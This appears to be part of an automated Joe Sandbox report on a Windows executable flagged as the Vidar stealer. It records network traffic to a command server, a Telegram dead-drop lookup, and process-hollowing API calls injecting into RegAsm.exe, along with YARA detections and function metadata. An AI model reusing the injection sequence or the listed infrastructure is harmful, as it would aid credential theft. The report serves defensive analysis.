Jun 19, 2024 14:40:23.550240993 CEST	9000	49757	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.181317091 CEST	9000	49757	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.181406975 CEST	49757	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.181912899 CEST	49757	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.184159040 CEST	49757	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.185985088 CEST	49758	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.186752081 CEST	9000	49757	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.189590931 CEST	9000	49757	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.189657927 CEST	49757	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.190915108 CEST	9000	49758	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.191009045 CEST	49758	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.191237926 CEST	49758	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.196116924 CEST	9000	49758	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.825395107 CEST	9000	49758	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.825510025 CEST	49758	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.825910091 CEST	49758	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.828072071 CEST	49758	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.829787016 CEST	49759	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.830801964 CEST	9000	49758	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.833184004 CEST	9000	49758	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.833254099 CEST	49758	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.836292982 CEST	9000	49759	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:24.836366892 CEST	49759	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.836638927 CEST	49759	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:24.842140913 CEST	9000	49759	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:25.477214098 CEST	9000	49759	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:25.477444887 CEST	49759	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:25.477883101 CEST	49759	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:25.479625940 CEST	49759	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:25.481699944 CEST	49760	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:25.482816935 CEST	9000	49759	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:25.485682011 CEST	9000	49759	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:25.485873938 CEST	49759	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:25.486582041 CEST	9000	49760	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:25.486665964 CEST	49760	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:25.486875057 CEST	49760	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:25.491691113 CEST	9000	49760	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:26.170007944 CEST	9000	49760	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:26.170147896 CEST	49760	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.170502901 CEST	49760	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.172557116 CEST	49760	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.174889088 CEST	49761	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.175498962 CEST	9000	49760	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:26.177794933 CEST	9000	49760	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:26.177875042 CEST	49760	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.179898977 CEST	9000	49761	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:26.179991007 CEST	49761	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.180263042 CEST	49761	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.186481953 CEST	9000	49761	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:26.824945927 CEST	9000	49761	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:26.825122118 CEST	49761	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.825443983 CEST	49761	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.827614069 CEST	49761	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:26.830220938 CEST	9000	49761	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:26.832978010 CEST	9000	49761	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:26.833039045 CEST	49761	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:41:32.890855074 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:41:32.890889883 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:41:32.890973091 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:41:49.753166914 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:41:49.753274918 CEST	49755	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:41:49.758141994 CEST	9000	49755	162.55.53.18	192.168.2.4
Jun 19, 2024 14:41:49.758383036 CEST	49755	9000	192.168.2.4	162.55.53.18

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 19, 2024 14:39:59.810946941 CEST	50394	53	192.168.2.4	1.1.1.1
Jun 19, 2024 14:39:59.820652962 CEST	53	50394	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 19, 2024 14:39:59.810946941 CEST	192.168.2.4	1.1.1.1	0x5593	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 19, 2024 14:39:59.820652962 CEST	1.1.1.1	192.168.2.4	0x5593	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	149.154.167.99	443	3872	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-19 12:40:00 UTC	89	OUT	GET /memve4erin HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-06-19 12:40:00 UTC	510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 19 Jun 2024 12:40:00 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12377 Connection: close Set-Cookie: stel_ssid=d61a94f01cc0a4b22a_804077314069880538; expires=Thu, 20 Jun 2024 12:40:00 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-06-19 12:40:00 UTC	12377	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 65 6d 76 65 34 65 72 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @memve4erin</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa

Target ID:	0
Start time:	08:39:58
Start date:	19/06/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xfd0000
File size:	455'680 bytes
MD5 hash:	2A042E0136D2125E744724A757F33950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:39:59
Start date:	19/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3a0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:39:59
Start date:	19/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x330000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:39:59
Start date:	19/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:39:59
Start date:	19/06/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 336
Imagebase:	0xf50000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6%
Total number of Nodes:	722
Total number of Limit Nodes:	4

Executed Functions

Function 0151018D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,015100FF,015100EF), ref: 015102FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0151030F
Wow64GetThreadContext.KERNEL32(00000134,00000000), ref: 0151032D
ReadProcessMemory.KERNELBASE(00000138,?,01510143,00000004,00000000), ref: 01510351
VirtualAllocEx.KERNELBASE(00000138,?,?,00003000,00000040), ref: 0151037C
TerminateProcess.KERNELBASE(00000138,00000000), ref: 0151039B
WriteProcessMemory.KERNELBASE(00000138,00000000,?,?,00000000,?), ref: 015103D4
WriteProcessMemory.KERNELBASE(00000138,00400000,?,?,00000000,?,00000028), ref: 0151041F
WriteProcessMemory.KERNELBASE(00000138,?,?,00000004,00000000), ref: 0151045D
Wow64SetThreadContext.KERNEL32(00000134,01540000), ref: 01510499
ResumeThread.KERNELBASE(00000134), ref: 015104A8

Strings

ReadProcessMemory, xrefs: 0151027A
VirtualAllocEx, xrefs: 0151028D
SetThreadContext, xrefs: 015102B3
TerminateProcess, xrefs: 0151038B
CreateProcessA, xrefs: 01510241
VirtualAlloc, xrefs: 01510254
WriteProcessMemory, xrefs: 015102A0
Load, xrefs: 015101CB
ResumeThread, xrefs: 015102C9
aryA, xrefs: 015101D3
ress, xrefs: 01510217
GetThreadContext, xrefs: 01510267
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 015102FB
GetP, xrefs: 0151020F

Memory Dump Source

Source File: 00000000.00000002.1828686976.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: c65d420ab78157bb05efd375547abd7811819ff004c45d38a2482da12e9bfcc4
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 8BB1F57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB345D774FA418B94

Function 00FD9390 Relevance: 25.1, APIs: 12, Strings: 2, Instructions: 560
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00008800,00000000,00000000,00000000), ref: 00FD96F6
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00FD9701
CloseHandle.KERNEL32(00000000), ref: 00FD9708
GetNumberOfEventLogRecords.ADVAPI32(00000000,00000000), ref: 00FD98EC
DestroyWindow.USER32(00000000), ref: 00FD99A2
GetConsoleWindow.KERNEL32 ref: 00FD99A8
GetDC.USER32(00000000), ref: 00FD99B1
__libm_sse2_sin_precise.LIBCMT ref: 00FD99D3
__libm_sse2_cos_precise.LIBCMT ref: 00FD99E9
SetPixel.GDI32(00000000,00000000,00000000,00FFFFFF), ref: 00FD9A45
ReleaseDC.USER32(00000000,00000000), ref: 00FD9A6C
DeleteAce.ADVAPI32(00000000,00000000,00000001,00000000,000000FF), ref: 00FD9A86

Strings

ADSdsfrhgt, xrefs: 00FD93A8
Alister, xrefs: 00FD976B

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: Window$CloseConsoleCreateDeleteDestroyEventHandleNumberObjectPixelRecordsReleaseSingleThreadWait__libm_sse2_cos_precise__libm_sse2_sin_precise
String ID: ADSdsfrhgt$Alister
API String ID: 1244222916-1240787274
Opcode ID: 1ea317b43c83062de7f6ba312309f6555f1de71238ea63a798f6008a25d28d8b
Instruction ID: 09aac0e7b76c33e35637728e8fa59ce82d8b13698424b6ae930e983ad39314a7
Opcode Fuzzy Hash: 1ea317b43c83062de7f6ba312309f6555f1de71238ea63a798f6008a25d28d8b
Instruction Fuzzy Hash: 03028973D2461D4BD704ABB59C413E9B66AEF6A320F584327F812AB3E1E3B44841FB45

Function 00FFA9B2 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FFA66B: CreateFileW.KERNELBASE(?,00000000,?,00FFAA5B,?,?,00000000,?,00FFAA5B,?,0000000C), ref: 00FFA688

GetLastError.KERNEL32 ref: 00FFAAC6
__dosmaperr.LIBCMT ref: 00FFAACD
GetFileType.KERNEL32(00000000), ref: 00FFAAD9
GetLastError.KERNEL32 ref: 00FFAAE3
__dosmaperr.LIBCMT ref: 00FFAAEC
CloseHandle.KERNEL32(00000000), ref: 00FFAB0C
CloseHandle.KERNEL32(00FF35F7), ref: 00FFAC59
GetLastError.KERNEL32 ref: 00FFAC8B
__dosmaperr.LIBCMT ref: 00FFAC92

Strings

H, xrefs: 00FFAC17

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: fe5fd0a694ea6125d49a5528eefb912e23189c48e5dd6892d4211d78dc67db57
Instruction ID: 4fe2c40cd56c5d5f97a91a361a6e713c094891bacf6aab6f87826f5c59988a34
Opcode Fuzzy Hash: fe5fd0a694ea6125d49a5528eefb912e23189c48e5dd6892d4211d78dc67db57
Instruction Fuzzy Hash: 7BA15572A1414C9FCF199F38DC51BBE3BA1AF06320F140259FA15DB3A1DB798842EB52

Function 00FD2920 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD2932
std::_Lockit::_Lockit.LIBCPMT ref: 00FD294F
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD2970
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD29CB
std::_Lockit::_Lockit.LIBCPMT ref: 00FD2A0C
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FD2A4F
std::_Facet_Register.LIBCPMT ref: 00FD2A78
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD2A91

Part of subcall function 00FD9D07: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00FD9D13

Strings

bad locale name, xrefs: 00FD2AA0

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 3096327801-1405518554
Opcode ID: 381e34156e2bfd9157fa4868b30ecf8c441882e60966701898bc11c5f553e3ba
Instruction ID: bc52fd581eeef4d0ef2646ff09163ccfab6193ade2e1b5916ea102e85ee6f8ff
Opcode Fuzzy Hash: 381e34156e2bfd9157fa4868b30ecf8c441882e60966701898bc11c5f553e3ba
Instruction Fuzzy Hash: A6418032A083518FC360DF58D880A5AB7E6EFA4760F09491FE88597311D739E905EB93

Function 00FEDB5C Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00FF5531,?,00000000,?,?,00FF57D2,?,00000007,?,?,00FF5CCB,?,?), ref: 00FEDB72
GetLastError.KERNEL32(?,?,00FF5531,?,00000000,?,?,00FF57D2,?,00000007,?,?,00FF5CCB,?,?), ref: 00FEDB7D

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: b3fd76e4f5e10f7bf3f3db5f8bbd6badd6ec6f3755c822a9500145ff578ab490
Instruction ID: 65f9acb2a597317e8e9d50fefd7461ccd226b3ceb3636f08b4ca5e006953a83a
Opcode Fuzzy Hash: b3fd76e4f5e10f7bf3f3db5f8bbd6badd6ec6f3755c822a9500145ff578ab490
Instruction Fuzzy Hash: 43E086325006886FDB112FA5EC09F993A5C9F40799F110020F60C8A070DF788880E794

Function 00FECE30 Relevance: 2.6, APIs: 2, Instructions: 71
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6dcf6f8f2a91f40c78da6f168e782db5778d5b82ad96f547cd23bd7f1278cf1a
Instruction ID: 5109f199276b23df646657b8cf906e5ff52fa3b52077fde44f91baee1f4e1de6
Opcode Fuzzy Hash: 6dcf6f8f2a91f40c78da6f168e782db5778d5b82ad96f547cd23bd7f1278cf1a
Instruction Fuzzy Hash: A01129B2A052856ED7203AB7ACC6E3B3A5E9F507757100135F514920A1DAAE8C07B2B0

Function 00FF35B8 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00FF35F2

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 3eacc1f5332e99fdd7d79ad95725b44390563389d1ec05bffeeda6d4e71d7677
Instruction ID: faa8af0e058da88205166f673435ac488d792d8948903450500c4ba65dfe0f85
Opcode Fuzzy Hash: 3eacc1f5332e99fdd7d79ad95725b44390563389d1ec05bffeeda6d4e71d7677
Instruction Fuzzy Hash: 69114571A0020AAFCB06DF58E941D9E7BF8EF48304F0040A9F908EB351D631EA11DBA5

Function 00FEDAFF Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,?,?,00FED075,00000001,00000364,00000006,000000FF,?,?,?,00FE0831,00FE09E0,?), ref: 00FEDB40

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 861eec05fafa1f6ce2441214287329fa9cdc09dfef65925090f8a2b2d6cd4a70
Instruction ID: 43a48df9262e2e9fdcbbff3c68bac540598570a67b1af9d91984fdb82054932e
Opcode Fuzzy Hash: 861eec05fafa1f6ce2441214287329fa9cdc09dfef65925090f8a2b2d6cd4a70
Instruction Fuzzy Hash: 9DF0E932A006A467DB216B238C01F5B7B5DAFC1770B1A8111BC0497591FB64DC00B2E1

Function 00FFA66B Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,00000000,?,00FFAA5B,?,?,00000000,?,00FFAA5B,?,0000000C), ref: 00FFA688

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 097c160937188608367a302bd3de143236b00bb36f2b96e3e5b572486392f08d
Instruction ID: 27d923c7fda09bd110cb2dd1641c3bf807df7e3123f67848335953333c6395a4
Opcode Fuzzy Hash: 097c160937188608367a302bd3de143236b00bb36f2b96e3e5b572486392f08d
